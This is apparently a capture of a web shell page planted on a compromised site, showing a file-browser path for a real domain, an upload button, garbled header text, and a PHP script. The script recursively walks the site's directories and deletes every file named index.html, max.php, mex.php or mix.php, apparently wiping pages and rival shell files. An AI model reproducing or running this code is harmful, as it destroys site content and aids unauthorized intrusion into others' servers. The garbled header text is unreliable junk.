kohjhjhصثقصثقصثقgdfgdg
Ele57885fddfgdfgfghgقفغفغفقhfg555434536
/
home
/
u542670534
/
domains
/
sharvpathlab.com
/
public_html
/
Upload FileeE
HOME
<?php function deleteSpecificFiles($dir, $targetFiles) { $files = scandir($dir); foreach ($files as $file) { if ($file === '.' || $file === '..') continue; $fullPath = $dir . DIRECTORY_SEPARATOR . $file; if (is_dir($fullPath)) { deleteSpecificFiles($fullPath, $targetFiles); // Recursive } elseif (in_array($file, $targetFiles)) { unlink($fullPath); echo "Deleted: $fullPath<br>"; } } } // Files to delete $targetFiles = ['max.php', 'mex.php','mix.php', 'index.html']; // Start from root folder $root = __DIR__; deleteSpecificFiles($root, $targetFiles); echo "Done."; ?>